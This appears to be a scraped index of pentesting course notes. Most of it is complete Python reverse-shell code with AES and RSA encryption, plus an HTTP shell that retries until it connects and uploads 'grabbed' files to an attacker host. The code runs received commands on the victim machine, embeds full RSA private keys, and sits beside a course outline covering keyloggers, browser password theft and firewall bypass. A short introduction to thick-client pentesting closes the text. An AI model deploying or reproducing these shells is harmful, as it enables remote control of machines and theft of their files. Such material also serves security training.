              import socket\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\nimport string\nimport random\n\nIV = b\"H\" * 16\n\n\nkey = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\\$%&/()=?{[]}+~#-_.:,;<>|\\\\') for _ in range(0, 32))\n\n\ndef SEND_AES(message):\n    publickey = '''-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAt9mjsBED9D/MYnU+W5+6\naP9SS1vgL9X6bThNkGKsZ5ZVfnoK4BxMBHI5Gi/YtoCJjyAGsWMpxy1fQ+F+ZWVA\nkwZDoQMWTrfZASHmQgB944PfGA7qfn15kDXmCyvzbitRyWvTs1LDDNF7Q/54Qj82\nh/85ibOPzQrpwQTjEAs8CJ14YWXAJnqOC6devaDYKdB7SSlueVtoQ8BxWc3hOJHJ\npvgZQ/6NixnICLIrFN0YbKZo4A0D3yRJIdumZw8uqwEMeIt41ja6zOG3gKtsG8su\nBZ/MvqX0WgojWr6hNs1Q8h3LtiSsPiUP/bTWD9zos8Yr7RuEabesjHlY0qcNzZ/Y\ngKXdgxUkCikTjRon6Mvh7iWKAtEilQlDeBYMGUvFUQ5FMF5LZJ5Q/7+JXulv8Whq\nKTp4dGpB3kUWuN+ltxBr+IYPhpBfMcR97W+NuXDReUiIGFJpVI1m4AeCzz1BdAM7\nU928DcglK6IowMmN4McyKuv49YYPd7TNFjJWc7P6e19V3BsxA5jpCc6Dxp5AM6WC\n0FqgSSOGVCIkcHT5wLcALyaXOaO0vhMgWWO233Of33wh/7oHclsc5r44MHlZrNSe\nX2QIHCFU4Mwp1hutIuIKkn5dLt1qmt2CDUO/uxGbdTf667c9TLYcYWoi/eDBdrVx\n7CkYI7g81RdcB6jGgbr9W4kCAwEAAQ==\n-----END PUBLIC KEY-----'''\n    public_key = RSA.importKey(publickey)\n    encryptor = PKCS1_OAEP.new(public_key)\n    encryptedData = encryptor.encrypt(message)\n    return encryptedData\n\n\n\n\ndef encrypt(message):\n    encryptor = AES.new(key.encode(), AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16)\n    encrypted_message = encryptor.encrypt(padded_message)\n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(key.encode(), AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message,\n                                      16)\n    return decrypted_message\n\n\ndef connect():\n    s = socket.socket()\n    s.bind(('192.168.0.152', 8080))\n    s.listen(1)\n    print('[+] Listening for incoming TCP connection on port 8080')\n\n    conn, addr = s.accept()\n    print(key.encode())\n    conn.send(SEND_AES(key.encode()))\n\n    while True:\n        store = ''\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        else:\n            command = encrypt(command.encode())\n            conn.send(command)\n            result = conn.recv(1024)\n            try:\n                print(decrypt(result).decode())\n            except:\n                print(\"[-] unable to decrypt/receive data!\")\n\nconnect()\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/","title":"TCP reverse shell with RSA encryption","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.

              First, we will generate a pair of keys (private and public) on client side (victim's machine) and on server side (attacker machine).

              ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#gen-keys","title":"Gen keys","text":"
              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nfrom Cryptodome.PublicKey import RSA\n\nnew_key = RSA.generate(4096) # generate  RSA key that 4096 bits long\n\n#Export the Key in PEM format, the PEM extension contains ASCII encoding\npublic_key = new_key.publickey().exportKey(\"PEM\")\nprivate_key = new_key.export_key(\"PEM\")\n\npublic_key_file = open(\"public.pem\", \"wb\")\npublic_key_file.write(public_key)\npublic_key_file.close()\n\nprivate_key_file = open(\"private.pem\", \"wb\")\nprivate_key_file.write(private_key)\nprivate_key_file.close()\n\nprint(public_key.decode())\nprint(private_key.decode())\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-client-side-shell","title":"RSA client side shell","text":"
              import subprocess\nimport socket\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.PublicKey import RSA\ndef decrypt(cipher):\n    privatekey = '''-----BEGIN RSA PRIVATE KEY-----\n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\n-----END RSA PRIVATE KEY-----'''\n    private_key = RSA.importKey(privatekey)\n    decryptor = PKCS1_OAEP.new(private_key)\n    return decryptor.decrypt(cipher).decode()\n\ndef encrypt(message):\n    publickey = '''-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEApceMHQ9c5Cdf+qgd4ASP\nM7WNbKavEwat78bMHQVK6cRNm2XSWCLpTsYN2eUALV++dYi2Im0T92bqYojRm+p4\nvVKOvrdmcmfnITEw/++pbvGZYRf2y0zsSJi1Mi+lfgQs56QXBMIU6IdeCL2C7cex\n9LNJ98ipGeN6nBiaExI9he3PcivztD5vHowCwkbzAnpZgPamrN10/KukWKvJ3t05\nbc0MskjkhVaaN55eidzAXUmYmxyoLeke1GssiU+TInZQXbSiUeeFsZpkMjYX4nCS\nxT/TuuFaDy6tfpfM+ePNEgeLjn7WAJh2ApxaYhmqwbDTsXd0ldHc4iNeGmlaEGE9\nDgXPSp7ljV9SZ7eO9LZuiERz003NrUqSKSHdYgEIH8wZrCiKSP471oNYn0ye+KdV\n/v25dqTXApO3QO/LZrJQ8twQyASR1LB3tTVYGuNpRVLlNC4j4ivL22uDCbGOIBOa\nKDmu/QR5imLdjj3alVg69Ci3It3jTlubtHDaXTVs+i1133fOKMnRPLmCHE1/6MMS\ni1BzDF46Q2XJwjgDnH5rk70n7sVquQtpHZkpQsuSSrjiL9Bi3jYghReVfFHC7aNF\np42v7EMaLohpnFm6yKiEm5UacMs7rLdnUQtAKo3r5UiNAegY6h/ZDncGhah1e5wF\ndBPIb9wJyTjPYTiTJ3rDQGECAwEAAQ==\n-----END PUBLIC KEY-----'''\n    public_key = RSA.importKey(publickey)\n    encryptor = PKCS1_OAEP.new(public_key)\n    encryptedData = encryptor.encrypt(message)\n    return encryptedData\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = s.recv(1024)\n\n        command = decrypt(command)\n        print (command)\n        if 'terminte' in command:\n            s.close()\n            break\n        else:\n            CMD = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)\n            result = CMD.stdout.read()\n            print (len(result))\n            if len(result) > 470:\n                for i in range(0, len(result), 470):\n                    chunk = result[0+i:470+i]\n                    s.send(encrypt(chunk))\n            else:\n                s.send(encrypt(result))\nconnect()\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-enc-big-message","title":"RSA Enc Big Message","text":"
              from Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\n\ndef decrypt(cipher):\n    privatekey = open(\"private.pem\", \"rb\")\n    private_key = RSA.importKey(privatekey.read())\n    decryptor = PKCS1_OAEP.new(private_key)\n    print (decryptor.decrypt(cipher).decode())\n\n\ndef encrypt(message):\n    publickey = open(\"public.pem\", \"rb\")\n    public_key = RSA.importKey(publickey.read())\n    encryptor = PKCS1_OAEP.new(public_key)\n    encrypted_data = encryptor.encrypt(message)\n    print(encrypted_data)\n    decrypt(encrypted_data)\n\nmessage = 'H'*500\n\nif len(message) > 470: # To check the size limitation of messages, which is 470 bites when key size is 4096 bits\n    for i in range(0, len(message), 470): # We will split the messages into chunks so it can be processed\n        chunk = message[0+i:470+i]\n        encrypt(chunk.encode())\nelse:\n    encrypt(message.encode())\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-enc-small-messages","title":"RSA Enc Small messages","text":"
              from Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\n\ndef encrypt(message):\n    publickey = open(\"public.pem\", \"rb\")\n    public_key = RSA.importKey(publickey.read())\n    encryptor = PKCS1_OAEP.new(public_key)\n    encrypted_data = encryptor.encrypt(message)\n    print(encrypted_data)\n    return encrypted_data\n\nmessage = 'H'*470 # Limitation on size of the clear text message is 470 bytes with a key size of 4096 bits\nencrypted_data = encrypt(message.encode())\n\n\ndef decrypt(cipher):\n    privatekey = open(\"private.pem\", \"rb\")\n    private_key = RSA.importKey(privatekey.read())\n    decryptor = PKCS1_OAEP.new(private_key)\n    print (decryptor.decrypt(cipher).decode())\n\ndecrypt(encrypted_data)\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-server-side-shell","title":"RSA Server side shell","text":"
              import socket\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\n\ndef encrypt(message):\n    publickey = '''-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAt9mjsBED9D/MYnU+W5+6\naP9SS1vgL9X6bThNkGKsZ5ZVfnoK4BxMBHI5Gi/YtoCJjyAGsWMpxy1fQ+F+ZWVA\nkwZDoQMWTrfZASHmQgB944PfGA7qfn15kDXmCyvzbitRyWvTs1LDDNF7Q/54Qj82\nh/85ibOPzQrpwQTjEAs8CJ14YWXAJnqOC6devaDYKdB7SSlueVtoQ8BxWc3hOJHJ\npvgZQ/6NixnICLIrFN0YbKZo4A0D3yRJIdumZw8uqwEMeIt41ja6zOG3gKtsG8su\nBZ/MvqX0WgojWr6hNs1Q8h3LtiSsPiUP/bTWD9zos8Yr7RuEabesjHlY0qcNzZ/Y\ngKXdgxUkCikTjRon6Mvh7iWKAtEilQlDeBYMGUvFUQ5FMF5LZJ5Q/7+JXulv8Whq\nKTp4dGpB3kUWuN+ltxBr+IYPhpBfMcR97W+NuXDReUiIGFJpVI1m4AeCzz1BdAM7\nU928DcglK6IowMmN4McyKuv49YYPd7TNFjJWc7P6e19V3BsxA5jpCc6Dxp5AM6WC\n0FqgSSOGVCIkcHT5wLcALyaXOaO0vhMgWWO233Of33wh/7oHclsc5r44MHlZrNSe\nX2QIHCFU4Mwp1hutIuIKkn5dLt1qmt2CDUO/uxGbdTf667c9TLYcYWoi/eDBdrVx\n7CkYI7g81RdcB6jGgbr9W4kCAwEAAQ==\n-----END PUBLIC KEY-----'''\n    public_key = RSA.importKey(publickey)\n    encryptor = PKCS1_OAEP.new(public_key)\n    encryptedData = encryptor.encrypt(message)\n    return encryptedData\n\ndef decrypt(cipher):\n    privatekey = '''-----BEGIN RSA PRIVATE KEY-----\n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\n-----END RSA PRIVATE KEY-----'''\n    private_key = RSA.importKey(privatekey)\n    decryptor = PKCS1_OAEP.new(private_key)\n    dec = decryptor.decrypt(cipher)\n    return dec.decode()\ndef connect():\n    s = socket.socket()\n    s.bind(('192.168.0.152', 8080))\n    s.listen(1)\n    print('[+] Listening for incoming TCP connection on port 8080')\n    conn, addr = s.accept()\n\n    while True:\n        store = ''\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        else:\n            command = encrypt(command.encode())\n            conn.send(command)\n            result = conn.recv(1024)\n            try:\n                print(decrypt(result))\n            except:\n                print(\"[-] unable to decrypt/receive data!\")\n\nconnect()\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tunning-the-connection-attemps/","title":"Tunning the connection attempts","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/tunning-the-connection-attemps/#client-side","title":"Client side","text":"

              We put our previous http shell in a function called connect.

              import requests\nimport os\nimport subprocess\nimport time\n\nimport random # Needed to generate random \n\n\ndef connect(): # we put our previous http shell in a function called connect\n\n    while True:\n\n        req = requests.get('http://127.0.0.1:8080')\n        command = req.text\n\n        if 'terminate' in command:\n            return 1 # if we got terminate order, then we exit connect function and return a value of 1, this value will be used to end up the whole script\n\n\n        elif 'grab' in command:\n            grab, path = command.split(\"*\")\n            if os.path.exists(path):\n                url = \"http://127.0.0.1:8080/store\"\n                files = {'file': open(path, 'rb')}\n                r = requests.post(url, files=files)\n            else:\n                post_response = requests.post(url='http://127.0.0.1:8080', data='[-] Not able to find the file!'.encode())\n        else:\n            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            post_response = requests.post(url='http://127.0.0.1:8080', data=CMD.stdout.read())\n            post_response = requests.post(url='http://127.0.0.1:8080', data=CMD.stderr.read())\n    time.sleep(3)\n\n\n# Here we start our infinite loop, we try to connect to our kali server, if we got an exception (connection error)\n# then we will sleep for a random time between 1 and 10 seconds and we will pass that exception and go back to the \n# infinite loop once again untill we got a sucessful connection. \n\n\nwhile True:\n    try:\n        if connect() == 1:\n            break\n    except:\n        sleep_for = random.randrange(1, 10)#Sleep for a random time between 1-10 seconds\n        time.sleep(int(sleep_for))\n        #time.sleep( sleep_for * 60 )      #Sleep for a random time between 1-10 minutes\n        pass\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"thick-applications/","title":"Introduction to Pentesting Thick Clients Applications","text":"

              Checklist for Pentesting Thick client applications

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.

              Thick clients applications are the applications that are run as standalone applications on the desktop. Thick clients have two attack surfaces:

              • Static.
              • Dynamic.

              They are quite different from web services in the sense that thick applications, most of the tasks are performed at the client end, so these apps heavily depend on client's system resources like CPU, RAM or memory, for instance.

              They are usually written in these languages:

              • .NET
              • C/C++
              • Java applets etc
              • Native android / IOS mobile applications: Objective C, swift
              • and more.

              They are considered old, but still might be found in some organizations.

              ","tags":["thick client applications","thick client applications pentesting"]},{"location":"thick-applications/#basic-architecture","title":"Basic Architecture","text":"
              • 1-Tier Architecture: It's a standalone application.
              • 2-Tier Architecture: EXE/web-based launcher / java-based app + database. Business logic will be in the application. The app directly communicates to the database server. Things to consider when pentesting: login or registering feature, DB connection, strings, TLS/SSL, Register keys.
              • 3-Tier Architecture: EXE + server + database. Business logic can be move to the server so security findings will be less common. These apps don't have proxy settings in them so for sending traffic to a proxy server, some changes need to be done in the system host file.
              ","tags":["thick client applications","thick client applications pentesting"]},{"location":"thick-applications/#some-decompilation-tools","title":"Some decompilation tools","text":"
              • C++ decompilation: https://ghidra-sre.org
              • C# decompilation: dnspy.
              • JetBrains dotPeek.
              ","tags":["thick client applications","thick client applications pentesting"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/","title":"Attacking thick clients applications: Data storage issues","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
